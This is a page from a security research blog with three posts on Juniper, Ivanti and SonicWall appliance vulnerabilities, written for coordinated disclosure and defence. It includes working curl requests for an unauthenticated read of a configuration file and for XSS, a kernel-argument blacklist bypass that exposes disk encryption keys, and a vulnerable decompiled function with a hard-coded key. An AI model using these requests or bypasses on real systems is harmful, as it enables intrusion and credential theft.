Normal view

There are new articles available, click to refresh the page.

Before yesterdaywatchTowr Labs - Blog

watchTowr Labs - Blog
The Second Wednesday Of The First Month Of Every Quarter: Juniper 0day RevisitedAliz Hammond
18 January 2024 at 07:38

The Second Wednesday Of The First Month Of Every Quarter: Juniper 0day Revisited

watchTowr Labs - Blog

By: Aliz Hammond

18 January 2024 at 07:38

The Second Wednesday Of The First Month Of Every Quarter: Juniper 0day Revisited

Who likes vulnerabilities in appliances from security vendors? Everyone loves appliance vulnerabilities! If, by 'everyone', you mean various ransomware and APT groups of course (and us).

Regular watchTowr-watchers (meta-towr-watchers?) will remember our previous blog post on Juniper's CVE-2023-36844 (and friends), in which we tore JWeb - Juniper’s typical appliance web interface - apart, and rearranged the pieces to form an RCE exploit for the aforementioned CVEs. That group of vulnerabilities went on to become some of 2023’s superstars, as discussed by our friends here:

But, as famous scientists, lawyers and judges have always said; “where there’s smoke, there is fire”. It’s just science.

In the process of our adventures into playing with security appliances that for some reason use PHP interfaces, we actually found more fire. Being the Internet-friends that we are, we duly reported these vulnerabilities to Juniper and which they have been working on ever since.

They did request that we extend our usual 90-day VDP window, and embargo the vulnerabilities until the 11th of January - to align with their release schedule.

For reasons only known to some, Juniper release security advisories in quarterly cycles, taking place on “the second Wednesday of the first month of every quarter”, which recently fell upon the 10th of January.

This strikes us as an odd schedule, given the cadence of the security world in general - we went looking to see if this aligned with certain star formations, or perhaps the location of the moon.

Not finding much fruit in that pursuit, we were forced to conclude that this is likely driven by business reasons - such as the difficulty of QA’ing fixes over a broad and somewhat fragmented combination of OS and hardware - which require that trade-off in responsiveness.

Despite these vulnerabilities being serious enough to require confidentiality during this extended period, Juniper didn’t view them as serious enough to warrant an out-of-cycle advisory or to consistently register CVE numbers (or even to mention them in the patch notes). [Update! Juniper have now done so - see the 'update' section at the end of the post]

But fear not, all the details you could need are contained in this blog post! There are four vulnerabilities in total, ranging in severity.

Let's dive in and take a look - they're good examples of subtle vulnerabilities creeping into a product that obviously has a long legacy behind it. Seemingly simple operations (such as 'format this error message nicely') turn into hazardous calls and enable XSS - and just as innocently, loading an arbitrary file from the file system turns into arbitrary file read.

For the purposes of this research, we looked at version 22.4R2.8 of JunOS.

The Main Course: Authentication Is Optional

Few words will catch an attacker's attention like the combination of these two - "missing authentication". Often the easiest vulnerabilities to exploit, they're beloved by everyone from script-kiddies through to APT groups, and with good reason.

Here, we have a classic case of missing authentication, as requesting a particular URL will enable us to read various temporary files, created by other users, which contain sensitive information.

During the normal course of operation - when an administrative user logs in - various temporary files are created, containing varying levels of sensitive information. The most juicy temporary file contains the entire system configuration, with everything from routing tables and IP data through to the encrypted device password.

You might be thinking - “this is a pretty disastrous file on which to omit authentication” but please remember that we are discussing an appliance from a security vendor and thus we have to expect the bar to be lower.

Fortunately for defenders, requesting this file does require that the correct filename - containing a number - be requested.

It is unclear, however, how that number is generated, and our observation suggests it is generated in a cryptographically insecure manner (for example, we've seen it increment by one when a new user authenticates).

We have a suspicion, but we’ll leave this challenge to the reader (and for fear of another KEV awardee).

$ curl --insecure -X $'POST'     \\
       --data-binary $'method=stream_file_data&force=.1136517270_root_cfg.json'  \\        $'<https://hostname/cache>'
-<html>
    <head></head>
    <body>
    <h5>Your session has expired. <a href="" onclick="return redirectToLogin(this);" style="color: blue;"> Click </a> to redirect to login page</h5>
    <script type="text/javascript">
        function redirectToLogin() {
            window.parent.location.href = "/";
            return false;
        }

        var response = confirm("Your Session has expired. Click OK to redirect to login page.");
        if(response)
            redirectToLogin();
        </script>
    </body>
    </html><?xml version="1.0" encoding="us-ascii"?>
<junoscript xmlns="<http://xml.juniper.net/xnm/1.1/xnm>" xmlns:junos="<http://xml.juniper.net/junos/22.4R0/junos>" schemaLocation="<http://xml.juniper.net/junos/22.4R0/junos> junos/22.4R0/junos.xsd" os="JUNOS" release="22.4R2.8" hostname="" version="1.0">
<!-- session start at 2023-09-26 16:22:25 UTC -->
<!-- No zombies were killed during the creation of this user interface -->
<!-- user root, class super-user -->
<rpc-reply xmlns:junos="<http://xml.juniper.net/junos/22.4R0/junos>">
{
    "configuration" : {
        "@" : {
            "junos:changed-seconds" : "1695144013",
            "junos:changed-localtime" : "2023-09-19 17:20:13 UTC"
        },
<truncated for brevity>

You can see here that we have requested the cache page, and the result is an HTML error page - but following that error page HTTP response is the output of JunOS's RPC mechanism, containing the appliance configuration. Yes... resilience...

It contains oodles of information, including the appliance root password hash:

...
        "system" : {
            "root-authentication" : {
                "encrypted-password" : "$6$36tD63Su$onV8mCOl5HAF2Z1sktp7Vu1ROKD1YJaGTLVNo5DSATHZ3YqCtcKy2e3tfgvhwFxP9WG5Mp9UA3ex11JGtIO/10"
            }
        }
...

That's not cricket!

Recovery of the plaintext of this hash allows an attacker to login to the Juniper appliance via a myriad of interfaces - J-Web itself, SSH, and more.

"Thankfully”, it uses SHA-512 (at least in our test environment), which is at least a secure hashing mechanism - but again having only the strength of a hashing mechanism to give you some comfort about the security of your appliance leaves a lot to be desired.

Given the current state of security appliances - this seems fairly serious and we'd love to understand what does meet the bar for Juniper's out-of-band patch servicing. Maybe a customer can ask?

Side-Dishes: Two-And-A-Half XSS

Our first side-dish vulnerability (assigned CVE-2023-36846 when we reported it in September) simply allows us to upload an arbitrary file to the server, and fetch it later on.

This is almost an XSS (allowing us to plant JavaScript for an unsuspecting administrator to later execute), but is saved by one detail - the filename served is dependent on the currently logged-in user, rendering it useless for privilege escalation.

To demonstrate this flaw, do a POST request to the user.php endpoint as shown below, supplying some data in the body of the request:

$ curl --insecure -X $'POST'      \\
     --data-binary $'watchTowr' \\
     $'<https://hostname/slipstream/preferences/user.php>'

{"status": "Error - Internal error. Cannot identify user."}{"status": "Success - Updated preferences for user"}

The conflicting error message suggests something has gone wrong, and indeed, it has. Requesting the same URL endpoint with a GET will cause the server to cough up the data we planted:

$ curl --insecure $'<https://hostname/slipstream/preferences/user.php>'

{"status": "Error - Internal error. Cannot identify user."}watchTowr

While in isolation this seems quite low-impact, we still view this as a lapse in integrity for an appliance that purports to have security purposes.

Two of the other side dishes are in a similar vein (but without CVE identifiers assigned), allowing an attacker to upload arbitrary data via POST data and display it in an unsafe manner.

Both vulnerabilities are within the webauth_operation.php endpoint (that we note Juniper has appeared to have now completely rm'd).

The first is within the emit_debug_note method, which will echo back the POST data it receives, wrapped in some HTML elements:

$ curl  --insecure -X $'POST'     \\
        --data-binary $'rs=emit_debug_note&rsargs[]=a&rsargs[]=device is on fire'  \\
         $'<https://hostname/webauth_operation.php>'
+:<h3><b>ERROR: device is on fire</b></h3><br><br><div style="text-align: left; font-family: monospace;"></div>''

However, we can embed HTML (and thus javascript) in there too:

$ curl --insecure -X $'POST'     \\
       --data-binary $'rs=emit_debug_note&rsargs[]=a&rsargs[]=<script>alert(\\'XSS\\');</script>'    \\
        $'<https://hostname/webauth_operation.php>'
+:<h3><b>ERROR: <script>alert('XSS');</script></b></h3><br><br><div style="text-align: left; font-family: monospace;"></div>''

The second is almost the same, with similar behavior caused by a different function in the same endpoint (sajax_show_one_stub):

curl --insecure -X $'POST' \\
     --data-binary $'rs=sajax_show_one_stub&rsargs[]=ab<script>alert(\\'watchTowr\\');</script>' \\
    $'<https://hostname/webauth_operation.php>'
+:
                // wrapper for ab<script>alert('watchTowr');</script>
                function x_ab<script>alert('watchTowr');</script>() {
            sajax_do_call("","ab<script>alert('watchTowr');</script>",
                                x_ab<script>alert('watchTowr');</script>.arguments);
                }

                ''

Closing Words

It's interesting how vulnerabilities seem to 'cluster' - in this case, while chasing a single vulnerability, we spotted a few different vulnerabilities in related code.

You'll probably be relieved to know (depending on your agenda) that Juniper has released fixes for all these issues. Juniper advise that while they haven't yet applied for a CVE ID, the first of our vulnerabilities is tracked as PR 1763260. It affects 'all versions of JunOS', and it is fixed in the following releases:

20.4R3-S9
21.2R3-S7
21.3R3-S5
21.4R3-S6
22.1R3-S5
22.2R3-S3
22.3R3-S2
22.4R3
23.2R1-S2
23.2R2
23.4R1

Likewise, Juniper advise they have not assigned CVE IDs for the two XSS vulnerabilities as of today. These vulnerabilities affect JunOS from version 22.4R1 onward, with the following versions containing fixes:

22.4R2-S2
22.4R3
23.2R1-S2
23.2R2
23.4R1

Finally, the 'missing authentication' vulnerability. Juniper again advise that this affects 'all versions of Junos'. Fixes are available for various versions of JunOS:

20.4R3-S9
21.3R3-S5
21.2R3-S7
21.4R3-S6
22.1R3-S5 (due to be released 1st Feb 2024)
22.2R3-S3
22.3R3-S2
22.4R3
23.2R1-S2
23.2R2
23.4R1

You may note that those users who require 22.1R3-S5 are left out in the cold, as patches for this version aren't available until the first of February. Juniper comment that "[we] have fixes available .. except for one release .. which we think is tolerable".

We can only hope this decision aligns with the threat model of Juniper's customer base.

As we mentioned previously - Juniper usually publish advisories on “the second Wednesday of the first month of every quarter”, which seems a strange schedule given how urgent security updates tend to be. We’ve often stated that a vendor’s response to vulnerabilities such as these can be critical in closing their client’s ‘window of vulnerability’.

Given this, it is interesting that Juniper did not find at least the missing authentication vulnerability to be severe enough to justify an out-of-cycle advisory, nor to register CVE or mention them in the release notes (although they did deem them important enough to request we delay our usual and industry-aligned 90-day VDP timeline). [Update - Juniper have now done this and provided additional explaination, see below for details]

This is what we do every day for our clients - if you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

Timeline

Date	Detail
16th September 2023	Initial report to Juniper
16th September 2023	watchTowr hunts for vulnerable appliances across client attack surfaces, and provides mitigation advice under confidentiality
7th November 2023	Juniper details fixes, requests disclosure extension until 11th January 2024
28th November 2023	watchTowr grants extension, requests additional information from Juniper
6th December 2023	watchTowr repeats previous request for additional information
11th January 2024	Coordinated disclosure date
18th January 2024	Ivanti happened, so watchTowr delayed disclosure
30th January 2024	Juniper publishes CVE and JSA disclosure (see below)

Update : 30th Jan 2024

After some pressure, Juniper have now issued CVE-2024-21619 and CVE-2024-21620, and noted "two additional vulnerabilities that had been addressed in JSA72300" (presumably we re-discovered bugs that they fixed while addressing JSA72300, deliberately or otherwise). They've also issued an out-of-cycle bulletin documenting these bugs and their fixes, and communicated via email their apologies for poor communication. They comment that "Our assessment of the vulnerabilities reported by you has changed", which explains the out-of-cycle advisory they previously concluded to be unnecessary.

They also explained that, due to non-technical reasons, they typically apply for CVE late in the reporting cycle, a process they have since reviewed, and state that their original intention was to apply for CVE (and publish a JSA) once fixes were available for all supported releases.

watchTowr Labs - Blog
Welcome To 2024, The SSLVPN Chaos Continues - Ivanti CVE-2023-46805 & CVE-2024-21887Aliz Hammond
13 January 2024 at 11:48

Welcome To 2024, The SSLVPN Chaos Continues - Ivanti CVE-2023-46805 & CVE-2024-21887

watchTowr Labs - Blog

By: Aliz Hammond

13 January 2024 at 11:48

Welcome To 2024, The SSLVPN Chaos Continues - Ivanti CVE-2023-46805 & CVE-2024-21887

Did you have a good break? Have you had a chance to breathe? Wake up.

It’s 2024, and the chaos continues - thanks to Volexity (Volexity’s writeup), the industry has been alerted to in-the-wild exploitation of 2 incredibly serious 0days (CVE-2023-46805 and CVE-2024-21887 - two bugs, Command Injection and Authentication Bypass) in Ivanti (also known as Pulse Secure) Connect Secure (ICS) and Ivanti Policy Secure appliances - facilitating a full-device compromise and takeover.

CVE-2023-46805 & CVE-2024-21887 have been widely reported in the media as being utilised by nation-state-linked APT groups to compromise Ivanti appliances.

We’ve made it no secret - we (watchTowr) hate SSLVPN appliances. Not the concept of them, but that they all appear to have been constructed with the code equivalent of string, stamped with the word ‘secure’ and then just left to decay for 20 years.

What makes this situation even more “offensive” is Ivanti’s response (or lack of) to these vulnerabilities especially given the context - at the time of writing, a mitigation XML file is all that is available, with staggered patches available from the 22nd Jan 2024 per Ivanti. Yes, really.

We’re tired of the lack of responsibility taken by organisations when their devices are the literal gate between the Internet and their internal networks and hold an incredibly critical, and sensitive position in any network architecture.

Here at watchTowr, our job is to tell the organisations we work with whether they’re affected. Thus, we dived in.

If you haven’t read Volexity’s write-up yet, I’d advise reading it first for background information.

What Are The Bugs

As we stated earlier, there are two bugs at play here;

CVE-2023-46805 and,
CVE-2024-21887

Both are chained together, with CVE-2023-46805 allowing an unauthenticated Internet-based attacker to elevate to execute administrative functionality (bypass authentication), and CVE-2024-21887 allowing Command Execution via Command Injection within vulnerable administrative functionality.

Ivanti has tried very hard to make understanding these vulnerabilities as difficult as possible, distributing only an XML ‘mitigation’ within a private customer portal, and providing no actual patch yet.

Our Approach To Deciphering

Our usual approach with this kind of bug is straightforward - copy all the files from the target appliance, apply the patch, and then compare files. The fixes should make themselves known in the diff, or so the theory goes.

In this case, there is;

No actual patch
An (encrypted) mitigation XML only

As we dived in, we noted that our approach was hampered slightly by the full-disk encryption that Ivanti use to secure their product - we can’t simply boot into another OS and mount the disks, as they are encrypted with LUKS. Our usual approach would be to extract FDE keys from GRUB, which would typically mount the root device before passing execution to the kernel, but in this case, this was fruitless.

Some further investigation revealed that even the initrd booted is encrypted, which is interesting in itself, and suggests that the kernel itself has been modified to decrypt the image on the fly.

The first thing to try here is the old-faithful init=/bin/sh kernel command line argument, which will, when passed from GRUB, start a shell on the target just after the initrd has been mounted. Once the initrd is mounted and we have a shell, we can simply observe the encryption keys and use them to cold-mount the disks.

Frustratingly, though, attempts to do this were ignored by the appliance, again suggesting a custom kernel. Time to look at that kernel a little closer.

What’s this we see?

__int64 __fastcall sub_FFFFFFFF826CC601(unsigned __int8 *a1)
{
  __int64 i;

  if ( strcmp(a1, "/bin/sh") )
    qword_FFFFFFFF827E2030 = a1;
  for ( i = 0LL; i != 31; ++i )
    qword_FFFFFFFF82212168[i] = 0LL;
  return 1LL;
}

is… is that a blacklist on the term /bin/sh?! Really?! What a bizarre check. It’s easily bypassed, of course, by specifying a slightly different (but equivalent) argument (such as //bin//sh).

Doing so drops us right into a recovery shell, where we can find the FDE keys in /etc/lvmkey, which can then be used to mount the encrypted partitions.

Our approach then is fairly simple - an image of a vulnerable device, an image of a mitigation-applied device, and.. compare!

Unfortunately for us, however, doing so reveals no useful changes between the ‘mitigation XML-applied’ appliances, and vulnerable appliances. Time to take a different tactic.

Perhaps instead of trying to diff the command line by ourselves, we should be paying more attention to what breadcrumbs the vendor has left for us. Let’s take a closer look at the advice that Ivanti has for applying the workaround.

Well, Ivanti’s documentation for the mitigation warns that (among other things) “Automation built with REST API for configuration and monitoring will be impacted”.

Perhaps we should shift our focus there - what can we see that’s changed in the REST API? Let’s fire off a bunch of requests to a ‘patched’ and a ‘vulnerable’ VM, and see if we can spot any divergences.

Aha! This is looking more like it!

There are a handful of API endpoints that now respond with the above message, stating that access has been ‘blocked by your administrator’, instead of their usual response.

It seems like we’ve found the endpoints that have been restricted by the patch.

Editors note: All details from this point onwards have been redacted due to some inner feeling of moral responsibility that has crept up on us, and not wishing to even possibly add to the current barrage of exploitation that neighbourhood APTs are in the midst of.

Detection Approach

It’s important to note here that these changes in API behaviour happen before any authentication has been carried out, which is a massive help for defenders - given this information, it is straightforward to detect appliances that have had the patch applied without needing to authenticate.

Requesting the endpoint /api/v1/configuration/users/user-roles/user-role/rest-userrole1/web/web-bookmarks/bookmark without supplying any authentication info will respond with an empty 403 if the device is vulnerable:

$ curl -v <https://host/api/v1/configuration/users/user-roles/user-role/rest-userrole1/web/web-bookmarks/bookmark>
...
< HTTP/1.1 403 Forbidden
< Transfer-Encoding: chunked
< X-XSS-Protection: 1
< Strict-Transport-Security: max-age=31536000
<

However, performing the same request on a mitigation XML-applied version yields a full HTML page, rendering as above:

$ curl -v <https://host/api/v1/configuration/users/user-roles/user-role/rest-userrole1/web/web-bookmarks/bookmark>
...
< HTTP/1.1 403 Forbidden
< Content-Type: text/html; charset=utf-8
< Connection: close
< Pragma: no-cache
< Cache-Control: no-store
< Expires: -1
< Content-Length: 3015
< Strict-Transport-Security: max-age=31536000
<
<!-- Copyright (c) 2022 by Ivanti Inc. All rights reserved -->

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name=robots content="none">
<link rel="icon" href="/dana-na/imgs/Product_favicon.png" type="image/png">
<title>Ivanti&#32;Connect&#32;Secure</title>

..truncated..

<div id="error_message_content"  class="intermediate__content">
Access to the Web site is blocked by your administrator. Please notify your system administrator. Made  request for $request to $host:$port

</div>

..truncated..

</html>

It is important to note that this is one of 'a few' detection mechanisms we've identified - but hold a genuine concern that further sharing would ease the reproduction steps for bad-actors that are likely also watching this situation.

Conclusion

Another day, another SSL VPN bug. Sigh.

It’s been a fun 48 hours for us - reproducing these vulnerabilities, building unauthenticated detection mechanisms and ensuring the attack surfaces we help protect aren’t affected.

We will share details - but while there is in-the-wild exploitation, and Ivanti has not even released a patch - it would be truly irresponsible of us to do so at this point. In this case, we leave you with the below image teasing the Command Injection vulnerability alone - just to keep you on the hook a little.

Our closing note would be that - and we’re sure there may be legitimate reasons - we are still more than a week away from an actual patch from a security vendor for a pair of vulnerabilities that are being used in the wild by nation-state-linked APT.

But, as an industry, here we are. This is a disappointing place to be.

Once real patches are released, in our usual fashion we will be releasing further details in all their gory (you will cry with us at how ridiculous this all is).

Until then, please ensure sure you apply the mitigation.release.20240107.1.xml that Ivanti provides, and be careful out there - the APT is looking for more vendors that don’t do basic security in their enterprise-grade products.

(P.S. Please also follow Ivanti’s advice and perform integrity checks on your device - applying the mitigation alone is not enough).

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about how the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, can support your organisation, please get in touch.

watchTowr Labs - Blog
Ghost In The Wire, Sonic In The Wall - Adventures With SonicWallAliz Hammond
20 October 2023 at 08:03

Ghost In The Wire, Sonic In The Wall - Adventures With SonicWall

watchTowr Labs - Blog

By: Aliz Hammond

20 October 2023 at 08:03

Ghost In The Wire, Sonic In The Wall - Adventures With SonicWall

Here at watchTowr, we just love attacking high-privilege devices (and spending hours thinking of awful titles [see above]).

A good example of these is the device class of ‘next generation’ firewalls, which usually include VPN termination functionality (meaning they’re Internet-accessible by network design). These devices patrol the border between the untrusted Internet and an organisation’s softer internal network, and so are a great place for attackers to elevate their status from ‘outsiders’ to ‘trusted users’.

We’ve found in previous research projects such devices usually drag behind them a legacy codebase, often full of vulnerabilities, weaknesses, unexpected behaviour, false-positives and forgotten functionality.

Up until now, one vendor has escaped our eye - SonicWall, a company who (as the name suggests) center around firewalls and secure border devices. Fear not, SonicWall users, the time has come for your devices to be scrutinised!

Like previous devices we’ve looked at, SonicWall's NGFW series of physical and cloud routers is designed to sit at the border to a corporate network and, conceptually, filter traffic. It does this with a traditional firewall, with rapidly-updated IP and DNS-based blocklists, and via other more complex means, such as a traditional antivirus and ‘deep’ SSL inspection.

In order to inspect encrypted traffic, the device is often equipped with a CA TLS certificate, meaning easy MiTM attacks for an attacker who manages to break into the device. VPN functionality makes it even more interesting to an attacker, since the device is thus accessible by a large amount of users and usually exposed to the entire internet.

Clearly this is a device positioned as high-privilege and hardened.

As you can imagine, we foam at the mouth at the prospect of some nice juicy bugs in such devices. As researchers, these are the challenges that keep us going - finding bugs and weaknesses to help the red team position itself at the best possible angle, so defenders can have the most realistic view of their network landscape.

Can we find a way to elevate from a VPN user to exploit the privileged position of the router in the network, bypassing firewall rules and access policies? Could we find RCE, enabling MiTM attacks? No TLS connection is safe when the device holds a root CA cert!

Device Acquisition

Acquiring access to a SonicWall device was easy - as is the trend these days, SonicWall have a cloud-based device via EC2, and also provide a ‘free trial’ period for us to do our analysis. Smashing! We fire it up and get going. If you’re following along at home, we played with version 7.0.1-5111 build 2052.

Our first step was to take an image of the disks to examine them offline. This is where we hit our first roadblock.

Encrypted disks

SonicWall, it seems, decided to use full-disk encryption in their EC2 image, which is frustrating as a security researcher not because it prevents access, but rather because defeating it it soaks up time that could be better spent doing actual analysis.

We can only speculate on SonicWall's motivation for doing so - perhaps some common audit requirement among their clients, an attempt to hinder tampering, or an effort to prevent counterfeit devices.

Fortunately, after some time, we found an excellent writeup (in Chinese, but us anglophones could figure out what was going on) on the topic of extracting the FDE keys, which suggests using a hypervisor’s debug features to set a breakpoint in the GRUB bootloader, responsible for mounting the disks (and thus having access to the FDE keys).

We applied this research to mount the disk partitions, and all seemed well - until we found one partition which we could not mount read-write, but would only mount read-only.

# cat key-p3 | cryptsetup luksOpen /dev/nvme0n1p3 p3
# cat key-p6 | cryptsetup luksOpen /dev/nvme0n1p6 p6
# cat key-p7 | cryptsetup luksOpen /dev/nvme0n1p7 p7
# cat key-p9 | cryptsetup luksOpen /dev/nvme0n1p9 p9
# mkdir /mnt/p3 /mnt/p6 /mnt/p7 /mnt/p9
# mount /dev/mapper/p3 /mnt/p3
mount: /mnt/p3: wrong fs type, bad option, bad superblock on /dev/mapper/p3, missing codepage or helper program, or other error.
       dmesg(1) may have more information after failed mount system call.
# mount /dev/mapper/p6 /mnt/p6
# mount /dev/mapper/p7 /mnt/p7
# mount /dev/mapper/p9 /mnt/p9

Why did partition 3 not mount? It’s definitely an ext3 partition:

# file --dereference --special-files /dev/mapper/p3
/dev/mapper/p3: Linux rev 1.0 ext2 filesystem data (mounted or unclean), UUID=39a04b61-3410-406d-8ee2-9a07635993e0 (large files)

Weird, huh? Fortunately dmesg gives us a clue:

# tail -n 1 dmesg
[  800.837818] EXT4-fs (dm-0): couldn't mount RDWR because of unsupported optional features (ff000000)

After some head-scratching, we realised that SonicWall took the additional step of setting the ‘required features’ flags in the ext4 filesystem to 0xFF (shown in the output of dmesg above). This tells the ext4 driver code that mounting the filesystem requires support for a whole bunch of features that don’t actually exist yet, and so, the ext4 driver errs on the side of caution and refuses to continue.

Presumably this is intended to prevent the SonicWall appliance from inadvertently mounting the partition read-write, rather than as a security measure.

To get around it, we can simply modify the partition’s flags, and then we can mount it:

# printf '\\000' | dd of=/dev/mapper/p3 seek=$((0x467)) conv=notrunc count=1 bs=1
# mount /dev/mapper/p3 /mnt/p3

Once we’ve finished, we can restore the original flags:

# umount /dev/mapper/p3
# printf '\\377' | dd of=/dev/mapper/p3 seek=$((0x467)) conv=notrunc count=1 bs=1

Et Voila - we have all the disk partitions mounted and can proceed to do our analysis.

First impressions

Once we’d sidestepped the disk encryption, our first impressions of the architecture were pretty positive, from a security point of view.

SonicWall made the decision to segment their offering via the rocket containerization platform, which can bring benefits to both manageability and security. We speculate that breaking out of the container is probably straightforward, due to the high-performance in-kernel packet switching code that the container has access to, although this was beyond the scope of our research (for now).

Like most devices in this class, the bulk of the application logic is in one large binary - the 95MB sonicosv binary. However, one thing that we found very useful is that SonicWall also ship a second binary, aptly named sonicosv.debug, which is approximately 50MB larger. While it is not a ‘debug’ binary in the sense that symbols are still stripped, it does contain a wealth of additional checks and logging functionality, which makes reversing the binary much, much easier.

There are also a bunch of seemingly-unused functions in the debug binary which make those long hours staring at a disassembler that little bit more amusing.

First bugs

So typically, once we open up a large new codebase like this, we spend some time getting acquainted with the code.

A few hours turn into a few days, as we write IDAPython snippets to extract function names from log functions, we identify functions that might come in handy later on, and generally figure out what’s going on.

It’s rare, at this stage, that we discover any vulnerabilities - but in this case, something rapidly caught our eye:

A leet-speak encoded string, being fed into an encryption primitive?! Oooh! What could this be? Let’s take a look around.

char key[512];
__int64 IV[2];
char encryptedData[208];

queryStringData = parseQueryStringData(a2);
for ( i = queryStringData; i; i = *i )
{
  if ( !strcmp(i->paramName, "url") )
  {
    if ( logThingToSyslog("NOTICE", "dynHandleBuyToolbar", 12239LL) )
      sub_1FF1DBC("Encypted URL Data [%s]", i->paramData);
    dataLen = strlen(i->paramData) / 2;
    if ( !dataLen )
    {
      if ( logThingToSyslog("NOTICE", "dynHandleBuyToolbar", 12245LL) )
        sub_1FF1DBC("No query data", "dynHandleBuyToolbar");
      break;
    }
    toEncrypt = SWCALLOC(1LL, dataLen, "dynHandleBuyToolbar", 12249LL);
    if ( toEncrypt )
    {
      sub_27D4B82(i->paramData, toEncrypt, dataLen);
      memset(encryptedData, 0, 0x200uLL);
      aesInit(1LL, "D3lls0n1cwLl00", 16LL, expandedKey);
      IV = {0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15};
      do_aes_cbc_encrypt(toEncrypt, encryptedData, dataLen, expandedKey, IV, NULL);
      v32 = strlen(encryptedData);
      v28 = encryptedData[v32 - 1];
      if ( !is_asc(v28) )
        encryptedData[v32 - v28] = 0;
      if ( logThingToSyslog("NOTICE", "dynHandleBuyToolbar", 12286LL) )
        sub_1FF1DBC("new buy toolbar URL [%s] length [%d] new length [%d]", encryptedData, v32, v32 - v28, v14, v15);
      snprintf(byte_D564F80, 0x100uLL, "%s", encryptedData);
      saveRamPrefs();
      swFree(toEncrypt, "dynHandleBuyToolbar", 12290LL);
      }
    }
  }
  freeQueryStringData(queryStringData);
}

Oh wow, what’s going on here?! First off, we have the weak key we just happened upon. Then there’s a hard-coded IV, and - to top it off - it looks like there’s an overflow in the encryptedData buffer. Yikes!

What is this functionality, though? We couldn’t find any references to it in SonicWall's documentation, nor any way to activate it. After some thorough investigation, we concluded that it could well be related to this “customer requested enhancement”, related to running a demo banner at the top of the site.

No matter how we reversed, though, we couldn’t seem to find a way to actually enable this functionality. We concluded that it either requires some arcane invocation, or that functionality to enable it simply isn’t present in retail builds of the SonicWall software.

We suspected, at this point, that SonicWall’s “demo” environment (in which an emulated SonicWall device is available publicly for prospective users to play with) may expose this code, but (for obvious legal and ethical reasons) we couldn’t probe the SonicWall site, and so our research into this bug ended here, with us reporting it to SonicWall's security team.

While we were somewhat uneasy about reporting a finding without being able to demonstrate the dire consequence of exploitation, Sonicwall took the finding seriously and assigned it CVE-2023-41713.

It is interesting to note that Sonicwall appear to have remediated the issue by removing this functionality entirely, suggesting it was indeed a half-baked solution to an extremely uncommon configuration used by the third-party vendor named in the secret. So, while we have a neat bug, it’s not ‘world-ending’ - our appetites whetted, we continued our search for bugs.

SSLVPN, my old friend

With the flurry of excitement of our first find fading fast, we decided we’d focus our efforts on the SSLVPN functionality that the device exposes.

This is historically a good spot to hunt bugs - we’ve seen a significant amount of truly ‘sky is falling’-level bugs in other appliances in this area - even recently - so perhaps we can replicate that success. We switch the SonicWall device to use the ‘debug’ version of the binary, for more verbose logging and easier reversing, and get cracking (so to speak).

Indeed, once we start looking, the flames of our hopes are fanned by the code we see - lots and lots of 90s-style C code handing lots and lots of user-provided data. What could possibly go wrong?!

As we’ve mentioned in previous posts, it’s always a good starting point to map HTTP routes when analyzing any web service, and this is no different - except rather than finding those routes in an apache.conf on the filesystem, they’re in the binary itself, and in this case, they’re spread out into a few different places, from tables of read-only data and tables maintained at runtime, all the way to hardcoded case statements.

Let’s take a look at some of what SonicWall terms ‘dynamic’ handlers. These are registered at system startup via the dynRegister function, which takes an ID, the URL of the object to register, and a handler function. Here’s an example:

Poking through some of these, there’s one for manipulating bookmark data for logged-in SSLVPN users. Who can spot the bug below?

__int64 __fastcall sub_3113AE4(unsigned int origin_socketIn, auto requestData, bool loginOverride)
{
  char domainName[128] = {0};
  char dest[200] = {0};

  unsigned int origin_socket = origin_socketIn;
  bool userIsLoggedIn = loginOverride || ((bool)checkUserLoggedIn(origin_socketIn));

  if ( requestData && requestData->unknown )
  {
    auto StringData = parseQueryStringData(requestData);
    for ( auto i = StringData; i != NULL; i = i->next )
    {
      if ( strcmp(i->paramName, "userName") == 0)
      {
        size_t paramDataLen = strlen(i->paramData);

        char* posOfAtSymbol = strchr(i->paramData, '@');
        if ( posOfAtSymbol != 0)
        {
          memcpy(dest, i->paramData, posOfAtSymbol - i->paramData);
          memcpy(domainName, posOfAtSymbol + 1, paramDataLen + s - posOfAtSymbol - 1);
        }
        else
        {
          memcpy(dest, i->paramData, paramDataLen);
        }
      }
      else if ( strcmp(i->paramName, "origin_socket") == 0 )
      {
        sscanf(i->paramData, "%d", &origin_socket);
      }
    }
    freeQueryStringData(StringData);
  }
  if ( !dest[0] )
    return 0xFFFFFFFFLL;
  if ( userIsLoggedIn)
    jsonPrintBookmarkArray(origin_socketIn, dest, domainName, origin_socket);
  return 0LL;
}

Those familiar with binary-level bug-hunting will quickly have their attention taken by the fixed-size buffers - two of them, in this case - dest and domainName. They’ll also be interested in the memcpy calls, and will be positively gripped by the combination - developers are always getting memcpy wrong and overflowing stack buffers for a nice easy-to-exploit stack overflow.

Indeed, this function doesn’t disappoint - simply feeding it a large enough string is enough to overflow the stack buffer:

